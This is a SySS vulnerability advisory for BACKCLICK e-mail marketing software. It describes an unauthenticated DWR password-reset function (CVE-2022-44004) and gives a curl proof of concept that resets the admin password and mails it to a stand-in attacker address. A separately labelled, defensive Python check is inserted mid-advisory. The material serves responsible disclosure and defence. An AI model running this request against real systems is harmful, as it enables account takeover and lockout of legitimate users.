Advisory ID: SYSS-2022-030
Product: BACKCLICK
Manufacturer: BACKCLICK GmbH
Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises)
Vulnerability Type: CWE-640: Weak Password Recovery Mechanism for Forgotten Password
                    CWE-306: Missing Authentication for Critical Function
Risk Level: High
Solution Status: Unknown
Manufacturer Notification: 2022-05-25
Public Disclosure: 2022-11-14
CVE Reference: CVE-2022-44004
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

BACKCLICK is a web application used for e-mail marketing and the creation
of newsletters.

The German manufacturer describes the product as follows (see [1]):

"BACKCLICK is a web-based enterprise e-mail marketing solution and
newsletter software with which you can create online e-mail campaigns and
newsletters and send them to your customers."

Due to insecure design or lack of authentication, unauthenticated attackers
can complete the password reset process for any account and set a new
password.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

One of the technologies used by the management web application is Direct
Web Remoting (DWR) to provide AJAX-style web services. These services can
also be accessed over the external web host and for the most part do not
seem to require any authentication.

One of the exposed functions is sendPasswordReminder, which accepts both
the target user ID (param0) and an arbitrary e-mail address (param1) to
trigger a password reset. Invoking the function will change the target
user's password (also a questionable process design, as it allows an
attacker to lock out users) and send the new password to the specified
address by e-mail.

The attacker would then be able to log in to the management web
interface; this, however, may be restricted to the internal web host.
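Added example (not from the advisory or the vendor): a Python parser for the DWR "exec" request format described above, together with the check a reset handler or an API gateway could apply so that sendPasswordReminder is only honoured for an authenticated session and only ever mails to the address already on record, never to the caller-supplied param1. The account table, the address admin@example.invalid and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed account table standing in for the application's user store.
USERS = {1: {"login": "bcadmin", "email": "admin@example.invalid"}}

# DWR exec bodies are newline-separated key=value lines; each call is
# prefixed c<index>- and typed params look like "number:1" / "string:foo".
PARAM_RE = re.compile(r"^c(\d+)-(param\d+|scriptName|methodName|id)=(.*)$")


def parse_dwr_body(body: str) -> dict:
    """Parse a DWR exec body into {"callCount": n, "calls": {idx: {...}}}."""
    calls, call_count = {}, 0
    for line in body.split("\n"):
        if line.startswith("callCount="):
            call_count = int(line.split("=", 1)[1])
            continue
        m = PARAM_RE.match(line)
        if not m:
            continue  # e.g. empty line, xml=true, batch/page ids
        idx, key, raw = int(m.group(1)), m.group(2), m.group(3)
        if key.startswith("param"):
            typ, _, val = raw.partition(":")
            raw = int(val) if typ == "number" else unquote(val)
        calls.setdefault(idx, {})[key] = raw
    return {"callCount": call_count, "calls": calls}


def reset_decision(call: dict, authenticated: bool) -> str:
    """Policy for sendPasswordReminder: a session is required and the
    caller-supplied address (param1) is never trusted; the account's address
    on record is the only valid destination. Returns "allow" or "deny: <why>"."""
    if call.get("methodName") != "sendPasswordReminder":
        return "allow"
    if not authenticated:
        return "deny: unauthenticated call to sendPasswordReminder"
    user = USERS.get(call.get("param0"))
    if user is None:
        return "deny: unknown user id"
    if call.get("param1") != user["email"]:
        return "deny: recovery address differs from the address on record"
    return "allow"


# Constructed request body in the shape of the advisory's PoC call.
POC_BODY = ("callCount=1\nc0-scriptName=GUIAjax\n"
            "c0-methodName=sendPasswordReminder\nc0-id=1287_1647860875148\n"
            "c0-param0=number:1\nc0-param1=string:mail%40attacker.com\n"
            "xml=true\n")
```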
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Invoking the web service via

-----
curl -i -s -k -H $'Content-Type: text/plain' \
    --data-binary $'callCount=1\x0ac0-scriptName=GUIAjax\x0ac0-methodName=sendPasswordReminder\x0ac0-id=1287_1647860875148\x0ac0-param0=number:1\x0ac0-param1=string:mail%40attacker.com\x0axml=true\x0a' \
    $'https://externalhost/bc/dwr/exec/GUIAjax.sendPasswordReminder.dwr'
-----

will change the target user account's (user ID 1, bcadmin) password to a
randomly generated one and send it to the specified e-mail address:

-----
Hallo bc admin,

Ihrem Backclick-Benutzer-Account wurde ein temporäres Passwort zugewiesen.
Bitte melden Sie sich mit dem temporären Passwort in Ihrer
Backclick-Umgebung an. Sie werden anschließend dazu aufgefordert ein neues
Passwort zu wählen.

Login: bcadmin
Passwort:
Mandant:
-----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Contact vendor for solution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-05-25: Vulnerabilities reported to manufacturer
2022-06-28: Advisories provided again, as originals were not received
2022-07-20: Confirmation, inquiry regarding reproduction of one issue
2022-11-14: No more information received, public disclosure of vulnerabilities

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for BACKCLICK
    https://www.backclick.de/
[2] SySS Security Advisory SYSS-2022-030
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-030.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.
E-Mail: moritz.bechler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en